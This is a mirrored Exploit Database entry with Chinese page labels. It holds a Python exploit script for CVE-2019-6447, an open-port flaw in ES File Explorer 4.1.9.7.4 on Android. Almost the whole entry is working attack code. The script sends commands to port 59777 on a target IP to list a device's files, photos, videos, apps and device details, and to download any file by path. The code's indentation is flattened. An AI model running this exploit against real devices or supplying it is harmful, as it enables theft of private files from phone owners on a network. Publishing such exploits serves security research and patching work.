ES File Explorer 4.1.9.7.4 – Arbitrary File Read

• Exploit Database
• 15 阅读

• 作者： Nehal Zaman
  日期： 2021-06-29
• 类别：

  • remote
  平台：

  • android
• 来源：https://www.exploit-db.com/exploits/50070/

• # Exploit Title: ES File Explorer 4.1.9.7.4 - Arbitrary File Read
  # Date: 29/06/2021
  # Exploit Author: Nehal Zaman
  # Version: ES File Explorer v4.1.9.7.4
  # Tested on: Android
  # CVE : CVE-2019-6447
  
  import requests
  import json
  import ast
  import sys
  
  if len(sys.argv) < 3:
  print(f"USAGE {sys.argv[0]} <command> <IP> [file to download]")
  sys.exit(1)
  
  url = 'http://' + sys.argv[2] + ':59777'
  cmd = sys.argv[1]
  cmds = ['listFiles','listPics','listVideos','listAudios','listApps','listAppsSystem','listAppsPhone','listAppsSdcard','listAppsAll','getFile','getDeviceInfo']
  listCmds = cmds[:9]
  if cmd not in cmds:
  print("[-] WRONG COMMAND!")
  print("Available commands : ")
  print("listFiles : List all Files.")
  print("listPics: List all Pictures.")
  print("listVideos: List all videos.")
  print("listAudios: List all audios.")
  print("listApps: List Applications installed.")
  print("listAppsSystem: List System apps.")
  print("listAppsPhone : List Communication related apps.")
  print("listAppsSdcard: List apps on the SDCard.")
  print("listAppsAll : List all Application.")
  print("getFile : Download a file.")
  print("getDeviceInfo : Get device info.")
  sys.exit(1)
  
  print("\n==================================================================")
  print("|ES File Explorer Open Port Vulnerability : CVE-2019-6447|")
  print("|Coded By : Nehal a.k.a PwnerSec |")
  print("==================================================================\n")
  
  header = {"Content-Type" : "application/json"}
  proxy = {"http":"http://127.0.0.1:8080", "https":"https://127.0.0.1:8080"}
  
  def httpPost(cmd):
  data = json.dumps({"command":cmd})
  response = requests.post(url, headers=header, data=data)
  return ast.literal_eval(response.text)
  
  def parse(text, keys):
  for dic in text:
  for key in keys:
  print(f"{key} : {dic[key]}")
  print('')
  
  def do_listing(cmd):
  response = httpPost(cmd)
  if len(response) == 0:
  keys = []
  else:
  keys = list(response[0].keys())
  parse(response, keys)
  
  if cmd in listCmds:
  do_listing(cmd)
  
  elif cmd == cmds[9]:
  if len(sys.argv) != 4:
  print("[+] Include file name to download.")
  sys.exit(1)
  elif sys.argv[3][0] != '/':
  print("[-] You need to provide full path of the file.")
  sys.exit(1)
  else:
  path = sys.argv[3]
  print("[+] Downloading file...")
  response = requests.get(url + path)
  with open('out.dat','wb') as wf:
  wf.write(response.content)
  print("[+] Done. Saved as `out.dat`.")
  
  elif cmd == cmds[10]:
  response = httpPost(cmd)
  keys = list(response.keys())
  for key in keys:
  print(f"{key} : {response[key]}")